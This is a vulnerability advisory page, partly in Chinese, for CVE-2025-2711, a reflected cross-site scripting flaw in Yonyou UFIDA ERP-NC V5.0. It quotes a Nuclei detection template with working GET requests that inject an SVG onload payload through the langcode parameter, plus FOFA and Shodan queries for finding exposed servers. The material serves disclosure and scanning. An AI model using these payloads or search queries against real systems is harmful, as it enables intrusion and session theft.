CVE-2025-2711: Yonyou UFIDA ERP-NC V5.0 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Yonyou UFIDA ERP-NC V5.0 | POC: 已公开

漏洞描述

Yonyou UFIDA ERP-NC V5.0 is vulnerable to reflected cross-site scripting (XSS) via the langcode parameter in /help/systop.jsp and /help/top.jsp. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.

PoC代码[已公开]

id: CVE-2025-2711

info:
  name: Yonyou UFIDA ERP-NC V5.0 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Yonyou UFIDA ERP-NC V5.0 is vulnerable to reflected cross-site scripting (XSS) via the langcode parameter in /help/systop.jsp and /help/top.jsp. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.
  impact: |
    Successful exploitation of this XSS vulnerability allows attackers to execute arbitrary JavaScript code in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious activities in the ERP system.
  remediation: |
    Update Yonyou UFIDA ERP-NC to the latest version. Implement proper input validation and output encoding for all user-supplied data, especially the langcode parameter in help JSP files.
  reference:
    - https://github.com/Hebing123/cve/issues/86
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2711
  classification:
    epss-score: 0.0008
    epss-percentile: 0.24475
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-2711
    cwe-id: CWE-79
    cpe: cpe:2.3:a:yonyou:ufida_erp-nc:5.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: yonyou
    product: ufida_erp-nc
    fofa-query: icon_hash="1085941792"
    shodan-query: title:"用友"
  tags: cve,cve2025,xss,erp-nc,ufida,yonyou

http:
  - method: GET
    path:
      - "{{BaseURL}}/help/systop.jsp?langcode=1%22%3E%3Csvg%20onload=alert(document.domain)%3E"
      - "{{BaseURL}}/help/systop.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.domain)%3E"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<svg onload=alert(document.domain)>.png)'
          - 'Search.jsp'
        condition: and

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 490a004630440220669d58715015c821246f668a9eb7fd9028cd8e5c04df85bf27b50799450283180220015dbf0c070a70d697d8fe650bc8d47ab35ce394a939273d690f7ae90e82f0c9:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-2711.yaml

相关漏洞推荐